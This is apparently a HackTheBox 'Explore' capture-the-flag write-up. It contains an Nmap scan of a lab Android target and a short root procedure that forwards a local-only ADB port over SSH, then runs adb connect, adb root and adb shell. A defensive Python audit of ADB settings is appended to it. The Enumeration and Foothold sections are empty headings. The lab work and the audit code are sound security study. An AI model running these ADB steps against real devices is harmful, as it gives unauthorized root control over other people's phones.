HackTheBox — Explore

Nmap Scan

Starting Nmap 7.80 ( https://nmap.org ) at 2021-07-02 15:57 EET
Nmap scan report for 10.10.10.247 (10.10.10.247)
Host is up (0.14s latency).

PORT STATE SERVICE VERSION
2222/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey:
|_ 2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
5555/tcp filtered freeciv
35971/tcp closed unknown
42135/tcp open http ES File Explorer Name Response httpd
|_http-title: Site doesn't have a title (text/html).
59777/tcp open http Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port2222-TCP:V=7.80%I=7%D=7/2%Time=60DF1B3D%P=x86_64-pc-linux-gnu%r(NUL
SF:L,24,"SSH-2\.0-SSH\x20Server\x20-\x20Banana\x20Studio\r\n");
Service Info: Device: phone

Enumeration

Initial Foothold

Getting root

  • First, we have to forward a port over SSH because the service is listening on localhost only: ssh -p 2222 -L 1337:localhost:5555 kristi@10.10.10.247
  • That means 127.0.0.1:1337 ==> 10.10.10.247:5555
  • Connect to the ADB service (port 5555) using the adb tool: adb connect <IP>:<PORT>
  • Check that the phone is connected to your PC: adb devices
  • Now, using the adb tool, we can do anything on the device, so to get root, type adb root to restart the adbd daemon with root permissions.
  • Connect to the ADB service again: adb connect <IP>:<PORT>
  • Finally: adb shell
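
The steps above work only when adbd listens on TCP and the build lets adbd restart as root. As an added example (not part of the original write-up), this defender-side check parses `adb shell getprop` output and flags those settings. The sample property values are constructed, not captured from this box, and the function names are hypothetical.

```python
import re

# Constructed sample of `adb shell getprop` output (not captured from the box).
SAMPLE_GETPROP = """\
[ro.build.type]: [userdebug]
[ro.debuggable]: [1]
[ro.adb.secure]: [0]
[service.adb.tcp.port]: [5555]
[sys.usb.config]: [adb]
"""

# getprop prints one property per line as "[key]: [value]".
PROP_LINE = re.compile(r"^\[([^\]]+)\]: \[(.*)\]$")


def parse_getprop(text):
    """Parse `[key]: [value]` lines into a dict, skipping anything malformed."""
    props = {}
    for line in text.splitlines():
        m = PROP_LINE.match(line.strip())
        if m:
            props[m.group(1)] = m.group(2)
    return props


def audit_adb(props):
    """Return findings for the settings that make the steps above possible."""
    findings = []
    # adbd listens on TCP when either property holds a positive port number.
    for key in ("service.adb.tcp.port", "persist.adb.tcp.port"):
        port = props.get(key, "")
        if port.isdigit() and int(port) > 0:
            findings.append(f"adb-over-tcp: {key}={port}")
    # `adb root` only restarts adbd as root on debuggable builds.
    if props.get("ro.debuggable") == "1":
        findings.append("adb-root-allowed: ro.debuggable=1")
    # Without ro.adb.secure=1, adbd does not require an authorised RSA key.
    if props.get("ro.adb.secure") != "1":
        findings.append("adb-auth-disabled: ro.adb.secure is not 1")
    return findings


if __name__ == "__main__":
    for finding in audit_adb(parse_getprop(SAMPLE_GETPROP)):
        print(finding)
```

An empty result means none of the three conditions hold. Any finding on a production device is worth fixing, because a local-only listener is still reachable by anyone who can log in and forward a port.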
